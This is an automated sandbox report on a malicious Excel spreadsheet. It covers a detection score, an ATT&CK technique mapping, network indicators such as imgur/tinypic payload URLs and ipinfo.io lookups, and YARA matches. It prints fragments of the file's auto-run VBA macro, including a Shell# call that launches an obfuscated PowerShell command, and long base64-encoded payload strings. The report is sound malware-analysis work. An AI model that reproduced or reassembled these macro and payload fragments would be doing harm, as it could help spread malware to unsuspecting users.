
Analysis Report XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls

Overview

General Information

Joe Sandbox Version: 25.0.0 Tiger's Eye
Analysis ID: 800718
Start date: 28.02.2019
Start time: 14:44:05
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 6m 56s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
Analysis stop reason: Timeout
Detection: MAL
Classification: mal88.troj.expl.evad.winXLS@25/38@6/3
EGA Information: Failed
HDC Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .xls
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe, csc.exe, powershell.exe, powershell.exe, csc.exe, csc.exe

Detection

Strategy: Threshold
Score: 88
Range: 0 - 100
Whitelisted: false
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification

Analysis Advice

  • Sample drops PE files which have not been started; submit the dropped PE samples for a secondary analysis to Joe Sandbox.
  • Uses HTTPS for network communication; use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis.



Mitre Att&ck Matrix

Techniques are listed per tactic column of the matrix; digits in parentheses are the count badges attached to that cell in the original matrix, kept as extracted.

Initial Access:
  • Valid Accounts
  • Replication Through Removable Media
  • Drive-by Compromise
  • Exploit Public-Facing Application
  • Spearphishing Link
  • Spearphishing Attachment
Execution:
  • Command-Line Interface (21)
  • PowerShell (2)
  • Scripting (32)
  • Exploitation for Client Execution (13)
  • Command-Line Interface
  • Graphical User Interface
Persistence:
  • Winlogon Helper DLL
  • Port Monitors
  • Accessibility Features
  • System Firmware
  • Shortcut Modification
  • Modify Existing Service
Privilege Escalation:
  • Process Injection (1)
  • Accessibility Features
  • Path Interception
  • DLL Search Order Hijacking
  • File System Permissions Weakness
  • New Service
Defense Evasion:
  • Disabling Security Tools (11)
  • Process Injection (1)
  • Deobfuscate/Decode Files or Information (1)
  • Scripting (32)
  • Masquerading
  • DLL Search Order Hijacking
Credential Access:
  • Credential Dumping
  • Network Sniffing
  • Input Capture
  • Credentials in Files
  • Account Manipulation
  • Brute Force
Discovery:
  • Process Discovery (1)
  • Security Software Discovery (1)
  • Remote System Discovery (1)
  • System Network Configuration Discovery (1)
  • File and Directory Discovery (1)
  • System Information Discovery (21)
Lateral Movement:
  • Application Deployment Software
  • Remote Services
  • Windows Remote Management
  • Logon Scripts
  • Shared Webroot
  • Third-party Software
Collection:
  • Data from Local System
  • Data from Removable Media
  • Data from Network Shared Drive
  • Input Capture
  • Data Staged
  • Screen Capture
Exfiltration:
  • Data Encrypted (1)
  • Exfiltration Over Other Network Medium
  • Automated Exfiltration
  • Data Encrypted
  • Scheduled Transfer
  • Data Transfer Size Limits
Command and Control:
  • Standard Non-Application Layer Protocol (2)
  • Standard Application Layer Protocol (2)
  • Custom Cryptographic Protocol
  • Multiband Communication
  • Standard Cryptographic Protocol
  • Commonly Used Port

Signature Overview



AV Detection:

Antivirus detection for submitted file
Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls; Avira: Label: X97M/Agent.1199011

Spreading:

Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\cmd.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic; DNS query: name: i.imgur.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic; TCP traffic: 192.168.1.16:49224 -> 151.101.36.193:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic; TCP traffic: 192.168.1.16:49224 -> 151.101.36.193:443

Networking:

May check the online IP address of the machine
Source: unknown; DNS query: name: ipinfo.io
Source: unknown; DNS query: name: ipinfo.io
Source: unknown; DNS query: name: ipinfo.io
Source: unknown; DNS query: name: ipinfo.io
Source: unknown; DNS query: name: ipinfo.io
Source: unknown; DNS query: name: ipinfo.io
IP address seen in connection with other malware
Source: Joe Sandbox View; IP Address: 151.101.36.193
Source: Joe Sandbox View; IP Address: 216.239.34.21
Source: Joe Sandbox View; IP Address: 216.239.32.21
Source: Joe Sandbox View; IP Address: 216.239.32.21
Internet Provider seen in connection with other malware
Source: Joe Sandbox View; ASN Name: unknown
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View; JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Downloads files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO
Found strings which match to known social media urls
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookups
Source: unknown; DNS traffic detected: queries for: i.imgur.com
Urls found in memory or binary data
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp; String found in binary or memory: http://apps.identrust.com
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://cert.int-x3.letsencrypt.org/0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://cps.letsencrypt.org0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootC
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp; String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRoot
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: powershell.exe, 00000004.00000002.1673064105.001B7000.00000004.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000004.00000002.1673064105.001B7000.00000004.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000004.00000002.1673064105.001B7000.00000004.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabW
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp; String found in binary or memory: http://ocsp.digicert.c
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://ocsp.digicert.com0F
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: powershell.exe, 00000004.00000002.1677892164.01F3C000.00000004.sdmp, powershell.exe, 00000009.00000002.1777809726.01DFC000.00000004.sdmp; String found in binary or memory: http://oi65.tinypic.com/2z8thcz.jpg
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp; String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000004.00000002.1677892164.01F3C000.00000004.sdmp, powershell.exe, 00000009.00000002.1777809726.01DFC000.00000004.sdmp; String found in binary or memory: https://i.imgur.com
Source: powershell.exe, 00000009.00000002.1774266374.002CB000.00000004.sdmp; String found in binary or memory: https://i.imgur.com/96vV0YR.png
Source: powershell.exe, 00000004.00000002.1677892164.01F3C000.00000004.sdmp, powershell.exe, 00000009.00000002.1777809726.01DFC000.00000004.sdmp; String found in binary or memory: https://i.imgur.com/96vV0YR.pngH
Source: powershell.exe, 00000004.00000002.1680343597.059DF000.00000004.sdmp, powershell.exe, 00000009.00000002.1782716792.05790000.00000004.sdmp; String found in binary or memory: https://ipinfo.io/country8
Source: powershell.exe, 00000004.00000002.1680343597.059DF000.00000004.sdmp, powershell.exe, 00000009.00000002.1783154339.05919000.00000004.sdmp; String found in binary or memory: https://ipinfo.io/countryx
Source: powershell.exe, 00000004.00000002.1680343597.059DF000.00000004.sdmp, powershell.exe, 00000009.00000002.1783154339.05919000.00000004.sdmp; String found in binary or memory: https://ipinfo.ioH
Source: powershell.exe, 00000004.00000002.1679759349.056B0000.00000004.sdmp, powershell.exe, 00000009.00000002.1782716792.05790000.00000004.sdmp; String found in binary or memory: https://ipinfo.ioh%
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp; String found in binary or memory: https://www.digicert.com/CPS0
Uses HTTPS
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49226
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49225
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49224
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49234
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49233
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49232
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49231
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49230
Source: unknown; Network traffic detected: HTTP traffic on port 49226 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49224 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49225 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49231 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49229 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49234 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49229
Source: unknown; Network traffic detected: HTTP traffic on port 49230 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49232 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49233 -> 443

E-Banking Fraud:

Drops certificate files (DER)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

System Summary:

Document contains an embedded VBA macro with suspicious strings
Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls; OLE, VBA macro line: If opa > xlBinsTypeBinSize * 347 - 1.07 Then ShowFormatTabs Else Application.Quit
Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls; OLE, VBA macro line: FarWd = Shell#(StopTabs & tiga + BiS(LineCVharts, tuf), 0)
Source: VBA code instrumentation; OLE, VBA macro: Module ThisWorkbook, Function SensetiveLine, String application.quit: Application.Quit; Name: SensetiveLine
Source: VBA code instrumentation; OLE, VBA macro: Module ThisWorkbook, Function ShowFormatTabs, String shell#: FarWd = Shell#(StopTabs & tiga + BiS(LineCVharts, tuf), 0); Name: ShowFormatTabs
Document contains an embedded VBA with base64 encoded strings
Source: VBA code instrumentation; OLE, VBA macro: Module ThisWorkbook, Function tiga, String qIYZn9Ht2um2m0iwVt4AA4ggYomdM56/MY2iQYuwNs8c4xuvFnD6gRhxnG1q+gpLTtjsMA6Ierk4kloEe6HL9aRgOh/shc1Mnu7FHFEsO7bmDBQ3LjROTzBZTBPdbbOKKsfFTWv6HTyMkmO3HbrWqGS2npvPS1OO4EXuzHuFL2FSAynlMeUPGpcwlL2fUe7pjr29kJxlQN35WaDzD29+JzgHRedSug6xirvFY0neHRMhxj9O5N7JcPYGgIEP3LKMk8LmTgce/XDbmoUFO/8wyIrGnRF49sVPlSnyPdTWIMzbrqCh83Qxwvq1sCj8Ju3p263QN4pSek6kf2K/OcggmF84+HSlJTXODz+U7XEtPNxAHDkkbJDtFTEx8Fd72gFn77dSgC7VCXjc6vHtzbJdj0GHr61Fq3dag7OcZEupjYqzWtWe1C3SYdhBpUHuC81vDyT8Cp9nCyk2jlbXjzBmlH1ORRccevKACeO99EFUUeekaN1gESmt0OuVKyQCjxZ6V5b04nqphnvlGkGdG5I6LUwrmu7aeV2svPpj8jtIsMRczxdQfCNw/dJtxb0BYnYXVk2nZfTu8LNWlN3TxDY1dcH/JabHwLKINn60byPed3XTtLlfqpvGHZYYhn3yZnwjlFPJDpLzHZkj+4ozmie5TOYCn3N3w4x+YhrCbxcePmKbHaLxh2bV8nifDlmhYOX79As7OmUQkSBB6cuUl7y6dGMcLXNcRT5P2YVxFOTpWGBdrm6V4HQo+6l0CbkOSZRS0WUvHgvVH0aKUcBmfvXhaTkgqxfH+Z2tgyLqzvqEEFBM8UlsgRYu+7jFtV9Fijsm/Eyi5MUVESxzokrwKSpaSklweDxZVVrxE2WO5KCbKGmxz79fm7qbnnx/1NFVGzHdKuJ9+q2WvY9+dptMIAvgruzohvn0GPsdc8UfVLcrqSODJ6WBL58M+pj/2He7+g846X7gfB6dTF4rnYzinSTn
Source: VBA code instrumentation; OLE, VBA macro: Module ThisWorkbook, Function tiga, String SZCSUSdQxNB0jSdR2jWPZ0lNFVf9pJSDfzrYs477+UuEreRSmSc0wkO5c+vNKJsKVAlN/ddPoTIX76bBsOvD5sd5aoAhu79t2Kdf7sjzWrtjtlyP4d3Gl9KW+de/687TUkuEQw5d1N5MDzRm84m2pHuNXXJiob70vQE3+KOBKFjyaGbPLbZfkL/9ks+p//+7Y//+usPv/v6y59//P1Xv/vlP+m7v3z9wzffp0+/+XP68sdvf/4mfZH/3X78In3+3+f0+XP6P
Document contains an embedded VBA with hexadecimal encoded strings
Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls; Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook': found hex strings
Source: VBA code instrumentation; OLE, VBA macro: Module ThisWorkbook, Function OwFormat, String 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
Powershell connects to network
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Network Connect: 151.101.36.193 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Network Connect: 216.239.32.21 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Network Connect: 216.239.34.21 443
Very long command line found
Source: unknown; Process created: Commandline size = 6831
Source: unknown; Process created: Commandline size = 6831
Source: unknown; Process created: Commandline size = 6831
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: Commandline size = 6831
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: Commandline size = 6831
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: Commandline size = 6831
Creates mutexes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Mutant created: \Sessions\2\BaseNamedObjects\Global\.net clr networking
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls; OLE, VBA macro line: Private Sub Frame1_Layout()
Source: VBA code instrumentation; OLE, VBA macro: Module Sheet1, Function Frame1_Layout; Name: Frame1_Layout
Document contains embedded VBA macros
Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls; OLE indicator, VBA macros: true
PE file does not import any functions
Source: h2oah0u7.dll.13.dr; Static PE information: No import functions for PE file found
Source: ua6j8io5.dll.5.dr; Static PE information: No import functions for PE file found
Source: 3ndkwphw.dll.14.dr; Static PE information: No import functions for PE file found
Reads the hosts file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Windows\System32\drivers\etc\hosts
Yara signature match
Source: 0000000C.00000002.1774294244.00330000.00000004.sdmp, type: MEMORY; Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.1674260172.01880000.00000008.sdmp, type: MEMORY; Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.1774174716.00260000.00000008.sdmp, type: MEMORY; Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.1781857851.045C0000.00000008.sdmp, type: MEMORY; Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000009.00000002.1774152919.00260000.00000004.sdmp, type: MEMORY; Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000C.00000000.1713368455.00010000.00000004.sdmp, type: MEMORY; Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000009.00000003.1708252755.002A8000.00000004.sdmp, type: MEMORY; Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000003.1637989998.001DA000.00000004.sdmp, type: MEMORY; Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.1679049173.04370000.00000004.sdmp, type: MEMORY; Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000004.00000003.1635248316.00010000.00000004.sdmp, type: MEMORY; Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000009.00000003.1705531360.00010000.00000004.sdmp, type: MEMORY; Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000009.00000002.1781647232.04430000.00000004.sdmp, type: MEMORY; Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.1780389444.03EA0000.00000008.sdmp, type: MEMORY; Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000009.00000002.1774181408.00287000.00000004.sdmp, type: MEMORY; Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000009.00000002.1774965388.00530000.00000004.sdmp, type: MEMORY; Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.1672911724.00080000.00000004.sdmp, type: MEMORY; Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.1677284178.01BB0000.00000008.sdmp, type: MEMORY; Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.1775135148.00620000.00000004.sdmp, type: MEMORY; Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000009.00000002.1775563713.012C0000.00000004.sdmp, type: MEMORY; Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000009.00000002.1774443824.00470000.00000008.sdmp, type: MEMORY; Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
